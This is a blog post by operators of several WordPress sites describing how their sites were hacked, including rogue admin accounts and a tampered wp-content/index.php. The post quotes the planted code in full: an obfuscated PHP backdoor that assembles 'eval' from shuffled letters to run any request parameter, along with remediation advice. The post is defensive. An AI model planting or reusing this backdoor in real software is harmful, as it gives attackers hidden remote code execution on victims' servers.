We are running several websites with WordPress in different categories – everything from blogs to online shops. WordPress is great. It is easy and powerful at the same time. Although there is one thing that gives us a doubt of the platform – our WordPress websites get hacked. Especially more popular ones.
Hackers use different techniques to grant themselves illegal access. In this post will we share most recent experiences with our hacked WordPress sites.
One of the most obvious attacks on our blog was new users that were added to the wp-users table. They were mostly users with usernames “admin” and “administrator” and empty or unreal email-addresses. User can’t typically log in with such email addresses, so that was an obvious hack. And we’ve also disabled registrations. Here are the ones we got last time:
Simply deleting these users didn’t do much – they appeared again days later.
In order to solve the problem, we changed new users rights to “Subscriber” as well as passwords and emails. Now all the data that hackers inserted into the database were updated with our data.
We aren’t sure what caused it, but it was probably a bug in a plugin or theme. The problem disappeared after a while.
Sometimes we see files that were changed without our consent or noticing it right away. Closer investigations show that there is seldom code we can spot right away. We often end up reinstalling all core files of WordPress just to be sure there aren’t any surprises hidden in the core files, and to remove files who are not supposed to be there. But sometimes we see changes and they are genius (and obfuscated)!
The easiest way to hack a website is to insert an eval
or base64_encode
functions. Once inside, the hacker can call these functions with his keys and do whatever he wants. But the problem is that everybody knows that and many protection software and plugins scan for obvious malicious software right away. Here comes the genius in people – how do you hide it?
Last time we spotted a new code it was inside the index.php within the wp-content folder (wp-content/index.php). The file is usually empty with a comment “Silence is golden”. This time it contained the following code snippet:
<?php 'v1'; $e = ' avel'; $f = create_function('', $e{3}.$e{2}.$e{1}.$e{4} .'( stripslashes( @ $_REQUEST["FFfertrNTAoTgRLOacet"] ) );' ); $f();
The line was inserted while we tested some new plugins on our beta-website that is actually CLOSED from the outside world by .htaccess directives. Could any of the plugins insert the code? Maybe. No inspections of the involved plugins yielded any results. It could be anything.
If you look at this code – it is actually rather good:
As it is explained here, scanning such code with antivirus software won’t give you any warnings.
We discover new files in our WordPress installations approximately once a year. They often get added without us noticing. Using file version system like Git and exploring all new changes from time to time helps spot the problem early.
The only thing to do when you see new files – reinstall WordPress. Get the newest version. Remove all unnecessary plugins. Inspect thoroughly all your own files for changes around the time your website was hacked, and inspect the log from around the time the file was modified.
We will update if we’re hacked again.
Update
About 6 month ago we have decided to try out Wordfence plugin for WordPress. It worked well for our blog type of website, but the plugin slowed horribly down our eCommerce stores with a lot of images.